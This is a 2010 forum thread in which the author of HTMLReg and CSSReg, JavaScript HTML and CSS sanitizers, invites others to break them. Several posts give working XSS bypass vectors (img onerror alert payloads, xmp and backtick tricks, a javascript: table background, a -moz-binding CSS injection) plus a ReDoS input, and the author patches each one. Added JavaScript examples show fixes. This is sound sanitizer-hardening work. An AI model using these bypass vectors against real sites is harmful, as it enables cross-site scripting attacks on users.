HTMLReg
Posted by: Gareth Heyes
Date: April 15, 2010 05:35AM

Next challenge, can you break a JavaScript based HTML sandbox?

http://www.thespanner.co.uk/2010/04/15/htmlreg/

*Updated*

@Kyo posted a vector on the cheatsheet that worked but I've patched it now...

1337 Hax0rs bypassing HTMLReg (in order of awesomeness vectors)
-----------------------------------------------------------------
1. Hasegawa <img src="x:x" alt="``onerror=alert(1)">
2. LeverOne <xmp><a alt='&lt;/xmp&gt;&lt;img/src=x:x onerror=alert(1)//'>jjj</a>
3. LeverOne <XMP><IMG src="lo</XMP><IMG src=. onerror=alert(/hacked/)//">
4. Mario <table background="javascript:alert(1)//">
5. Kyo <img src= alt=" onerror=alert(1)//">
6. theharmonyguy <img class="& #09;myclass& #09;">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 5 time(s). Last edit at 05/11/2010 05:22PM by Gareth Heyes.

Re: HTMLReg
Posted by: LeverOne
Date: April 15, 2010 12:09PM

input:
<img src=`lo<img src=. onerror=alert(/hacked/)//`>
output:
<IMG src="#" src="." onerror="alert(/hacked/)//`">


list of winners, please! ))

----------------------
~Veritas~

Re: HTMLReg
Posted by: LeverOne
Date: April 15, 2010 12:27PM

and more!

input:
<XMP><IMG src="lo</XMP><IMG src=. onerror=alert(/hacked/)//">

output:
<XMP><IMG src="lo</XMP><IMG src="." onerror='alert(/hacked/)//"'>

upd: -- sorry, "<" --> "%3C" (not seen in Opera)




Edited 1 time(s). Last edit at 04/15/2010 12:54PM by LeverOne.

Re: HTMLReg
Posted by: lightos
Date: April 15, 2010 12:30PM

Nice one LeverOne. Btw, the extra <img src=. can be removed and it still works.

Re: HTMLReg
Posted by: Anonymous User
Date: April 15, 2010 02:20PM

@LeverOne Awesome stuff - again! :)

<img src=` onerror=alert(1)//`> <- the problem is the back-ticks misunderstood as delimiter - maybe it'd make sense to treat them as such on IE only? Also I would suggest to encode src as well - like it's done for href and other attributes



Edited 1 time(s). Last edit at 04/15/2010 02:30PM by .mario.

Re: HTMLReg
Posted by: Anonymous User
Date: April 15, 2010 02:36PM

This one triggers strange delimiter replacement on Opera 10+:

In: <marquee src=`" onscroll=alert(1)//`>

Out: <MARQUEE src='`"' onscroll="alert(1)//`">

Re: HTMLReg
Posted by: Gareth Heyes
Date: April 15, 2010 03:36PM

AWESOME!

I shall remove ` as an attribute delim............

AND FIXED! :)

Update....
theharmonyguy also reported some cool class bypasses <img class="& #09;myclass& #09;"> now fixed as I don't allow classes outside the application. So myclass becomes $myapplication_myclass$




Edited 2 time(s). Last edit at 04/16/2010 02:53AM by Gareth Heyes.

Re: HTMLReg
Posted by: Gareth Heyes
Date: April 16, 2010 08:01AM

Fixed a REDOS issue that I found using spaces as I was doing:-
([\s]|[^'])*

The vector was like this:-
<div class=" a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a "

Also added limits to the RegExes so that we have an attribute length limit (1000) and maximum attributes per tag (20).

Update...
I missed this one:-
<XMP><IMG src="lo</XMP><IMG src="." onerror='alert(/hacked/)//"'>

Wow nice! :) I'm fixing now


Update++

Think it's fixed with recent changes, can anyone still repro?




Edited 2 time(s). Last edit at 04/16/2010 08:24AM by Gareth Heyes.

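The ReDoS described in the post above, as an added example that is not HTMLReg's own code: the quoted fragment `([\s]|[^'])*` has two alternatives that both match a space, so on a failing input every space doubles the work, and the two fixes the post names (a single non-overlapping character class and an attribute length cap) remove the blow-up. The surrounding `<div class="...">` pattern is an assumption about how HTMLReg used the fragment.

```javascript
const MAX_ATTR_LEN = 1000; // the attribute length limit the post mentions

// Vulnerable: a space matches both [\s] and [^'], so each space doubles the number of
// ways the group can match. With no closing ">" the overall match fails and the engine
// explores every combination before giving up (assumed surrounding pattern).
const CLASS_VULNERABLE = /<div class="([\s]|[^'])*"\s*>/;

// Fixed: one character class with no overlap, and the value length bounded by the regex.
const CLASS_FIXED = new RegExp('<div class="([^"\']{0,' + MAX_ATTR_LEN + '})"\\s*>');

function makeVector(pairs) {
  // Constructed input: the post's " a a a ..." payload with no closing ">".
  return '<div class="' + ' a'.repeat(pairs) + ' "';
}

function timeMatch(re, input) {
  const t0 = Date.now();
  const m = re.exec(input);
  return { matched: m !== null, ms: Date.now() - t0 };
}

// Extracts the class value with the fixed pattern; null when the tag is malformed
// or the attribute exceeds MAX_ATTR_LEN.
function extractClass(html) {
  const m = CLASS_FIXED.exec(html);
  return m ? m[1].trim() : null;
}

// Keep the exponent small so the demo finishes: 19 spaces is already measurable.
const vector = makeVector(18);
console.log("vulnerable:", timeMatch(CLASS_VULNERABLE, vector));
console.log("fixed:     ", timeMatch(CLASS_FIXED, vector));
console.log("valid:     ", extractClass('<div class="myclass">'));
```

Raising the argument of `makeVector` by one roughly doubles the vulnerable time while the fixed pattern stays flat; the quoted payload with about 150 spaces would never finish.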
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 16, 2010 08:45AM

Ok this one fixed too:-
<XMP><IMG src="lo</XMP><IMG src=. onerror=alert(/hacked/)//">

Removed <> from allowed characters in attributes. Damn Opera!


Re: HTMLReg
Posted by: Gareth Heyes
Date: April 23, 2010 12:15PM

So it appears I can't trust the DOM when creating individual css rules in various browsers. So, you guessed it, I wrote a CSS regex parser.

HTMLReg updated!
http://www.businessinfo.co.uk/labs/HTMLReg/HTMLReg.html

You can play with the CSSReg parsing here:-
http://www.businessinfo.co.uk/labs/CSSReg/CSSReg.html

All this is because sirdarckcat is awesome and proved the current method flawed.

Can you break it/them? :D


Re: HTMLReg
Posted by: LeverOne
Date: April 23, 2010 03:14PM

it's easy for me...

in:
background:url(//lo&#x0A&#x29;;-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss&#x29/*);
out:
background:url('//lo&#x0A&#x29;;-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss&#x29/*');

LeverOne

upd: CSSReg only.




Edited 3 time(s). Last edit at 04/23/2010 04:19PM by LeverOne.

Re: HTMLReg
Posted by: Gareth Heyes
Date: April 23, 2010 04:29PM

Haha nice I'll have to update my replacement chars


Re: HTMLReg
Posted by: sirdarckcat
Date: April 24, 2010 05:09PM

this doesn't work!
<div style="background-image: url('http://red/x?y=1');">xxx</div>

and is broken anyway heh
x{
background-image:url('http://xD/x?z=m'asdf;
lulz:lolz;
lolz:lolz');
}

use ACS/CAJA!

Greetings

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: HTMLReg
Posted by: Kyo
Date: April 25, 2010 12:40PM

Hey, neat. I'm now breaking applications without being aware of them

Skillz

Re: HTMLReg
Posted by: Gareth Heyes
Date: April 26, 2010 02:27AM

@Kyo

It's called the art of XSS without XSS ;)

@sirdarckcat

Yeah yeah :P

@LeverOne @sirdarckcat

Fixed CSSReg that was easy but HTMLReg is still not 100% because of CSS DOM rewriting


Re: HTMLReg
Posted by: Gareth Heyes
Date: April 26, 2010 05:45PM

Ok with EXTREME difficulty I've hacked up some css with IE so it doesn't rewrite the CSS but does clean HTML. This should be pretty safe from attack now *I think*


Re: HTMLReg
Posted by: Gareth Heyes
Date: April 29, 2010 05:15AM

No exploits for a while, so I thought I'd make it a little easier. HTMLReg/CSSReg now decode entities into escapes:-

<div style="background-image:url('/x&amp;x')">xxx</div>

Becomes:-

<div style="background-image: url('/x\26 x');">xxx</div>

C'mon pwn me

Still no exploits? :)
I've made it easier now, I've included the style tags and selectors
http://www.businessinfo.co.uk/labs/CSSReg/CSSReg.html

e.g.
Allowed:-
span, div, #id .someclass {
color:#FFF;
}

Banned:-
body {} //disallowed tag
span + div {} //only basic selectors allowed .class #id or ,




Edited 1 time(s). Last edit at 04/30/2010 08:59AM by Gareth Heyes.

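The selector rule described in the post above (only tag names, `.class`, `#id`, descendant spaces and `,`; `body` and combinators such as `+` rejected), as an added example that is not CSSReg's own code. It namespaces classes and ids in the `#myApplication ._myApplication_lo_` form quoted later in the thread; the `myApplication` prefix and the tag allow-list are assumptions.

```javascript
const APP = "myApplication";                                   // assumed namespace
const ALLOWED_TAGS = new Set(["span", "div", "a", "p", "b", "i", "img", "table"]); // assumed

// One compound selector: an optional tag name followed by any number of .class / #id parts.
const COMPOUND = /^([a-z][a-z0-9]*)?((?:[.#][a-z_][a-z0-9_-]*)*)$/i;

function rewriteCompound(sel) {
  const m = COMPOUND.exec(sel);
  if (!sel || !m) return null;                    // "+", ">", "*", ":hover" ... all fail here
  const tag = m[1] ? m[1].toLowerCase() : "";
  if (tag && !ALLOWED_TAGS.has(tag)) return null; // body, html, script ...
  const parts = (m[2].match(/[.#][a-z_][a-z0-9_-]*/gi) || []).map(p =>
    (p[0] === "." ? "._" : "#_") + APP + "_" + p.slice(1) + "_");
  return tag + parts.join("");
}

// Rewrites a comma-separated selector list, prefixing every group with the application
// container; returns null when any part is outside the allowed grammar.
function rewriteSelector(selector) {
  const groups = [];
  for (const group of selector.split(",")) {
    const compounds = group.trim().split(/\s+/).map(rewriteCompound);
    if (compounds.some(c => c === null)) return null;
    groups.push("#" + APP + " " + compounds.join(" "));
  }
  return groups.join(", ");
}

// Constructed inputs: the allowed and banned selectors from the post.
console.log(rewriteSelector("span, div, #id .someclass"));
console.log(rewriteSelector("body"));        // null: disallowed tag
console.log(rewriteSelector("span + div"));  // null: combinator
```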
Re: HTMLReg
Posted by: sirdarckcat
Date: May 01, 2010 02:45AM

haha I'll pwn it, don't worry :P, I've been busy this week.. my internetz failz


Re: HTMLReg
Posted by: LeverOne
Date: May 01, 2010 07:23AM

I found a small bug in CSSReg, but it's harmless (v.0.0.11).

in
.lo{.lo{background:url(//);
#lo{background:url(//)}
out
#myApplication ._myApplication_lo_ { 
#myApplication ._myApplication_lo_ { 
background:url('//');#myApplication #_myApplication_lo_ { 
background:url('//');
}


Re: HTMLReg
Posted by: Gareth Heyes
Date: May 01, 2010 11:24AM

@LeverOne

Yeah small bug but nice :) I'll fix it though

Update...
And fixed! Thanks, CSSReg now closes open { when not closed and doesn't allow multiple open selectors without closing them first. This makes it much better for parsing CSS thanks again




Edited 1 time(s). Last edit at 05/01/2010 02:49PM by Gareth Heyes.

Re: HTMLReg
Posted by: sirdarckcat
Date: May 11, 2010 02:20PM

courtesy of hasegawa

<img src="x:x" alt="``onerror=alert(1)">


Re: HTMLReg
Posted by: LeverOne
Date: May 11, 2010 03:29PM

@sirdarckcat & @hasegawayosuke, NICE!

From me:

<xmp><a alt='&lt;/xmp&gt;&lt;img/src=x:x onerror=alert(1)//'>jjj</a>

Edit: Opera + IE!




Edited 2 time(s). Last edit at 05/12/2010 12:27AM by LeverOne.

Re: HTMLReg
Posted by: Gareth Heyes
Date: May 11, 2010 03:53PM

@LeverOne, @sirdarckcat & @hasegawayosuke

All awesome! :D Thanks!!!


Re: HTMLReg
Posted by: Gareth Heyes
Date: May 11, 2010 05:20PM

Annnnnnnnnnddddddd fixed!!!!

I've removed innerHTML for the element div as it is just crazy what IE/Opera return. I build the HTML manually by constructing the < tagName then loop through the attributes and values and force "" and escape the node value with a whitelist of course. Because of this change I now allow <> inside attributes. Thanks ALL!!!!!!

Update...
Added form elements because I'm going to allow apps to be created on HV. Textarea, input etc. are now supported. Form is supported but without the action attribute




Edited 2 time(s). Last edit at 05/14/2010 12:28PM by Gareth Heyes.

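The manual serializer described in the post above, as an added example that is not HTMLReg's own code: emit `<` plus the tag name, walk the attributes, force double quotes and escape values against a whitelist instead of trusting what innerHTML returns. The tag and attribute allow-lists and the numeric-entity escaping scheme are assumptions; the thread does not show HTMLReg's real lists.

```javascript
const ALLOWED_TAGS = new Set(["a", "img", "div", "span", "table", "input", "textarea", "form"]);
const ALLOWED_ATTRS = new Set(["src", "alt", "href", "class", "id", "title", "name", "type", "value"]);
// Neither list contains on* handlers, style or form's action, so those are dropped silently.

function escapeAttr(value) {
  // Whitelist escaping: every character outside the safe set becomes a numeric entity, so
  // quotes, backticks, "<", ">" and "&" in a value can never end the attribute or the tag.
  return String(value).replace(/[^A-Za-z0-9 ._:\/#?=,\-]/gu,
    ch => "&#" + ch.codePointAt(0) + ";");
}

// Builds "<tag attr="..." ...>" from an element name and a plain attribute map;
// returns null for a tag outside the allow-list.
function serializeElement(tagName, attributes) {
  const tag = String(tagName).toLowerCase();
  if (!ALLOWED_TAGS.has(tag)) return null;
  let out = "<" + tag;
  for (const [name, value] of Object.entries(attributes)) {
    const n = name.toLowerCase();
    if (!ALLOWED_ATTRS.has(n)) continue;              // onerror, style, action ... dropped
    out += " " + n + '="' + escapeAttr(value) + '"';  // always double quoted
  }
  return out + ">";
}

// Constructed inputs: the Hasegawa and LeverOne vectors quoted in this thread, and a
// payload that would only be live if on* attributes were ever copied through.
console.log(serializeElement("img", { src: "x:x", alt: "``onerror=alert(1)" }));
console.log(serializeElement("a", { alt: "</xmp><img/src=x:x onerror=alert(1)//" }));
console.log(serializeElement("img", { src: "x:x", onerror: "alert(1)" }));
```

Because the backticks, parentheses and angle brackets come out as entities inside a double-quoted value, neither IE's backtick delimiter handling nor a literal `</xmp>` in the value can break out of the attribute.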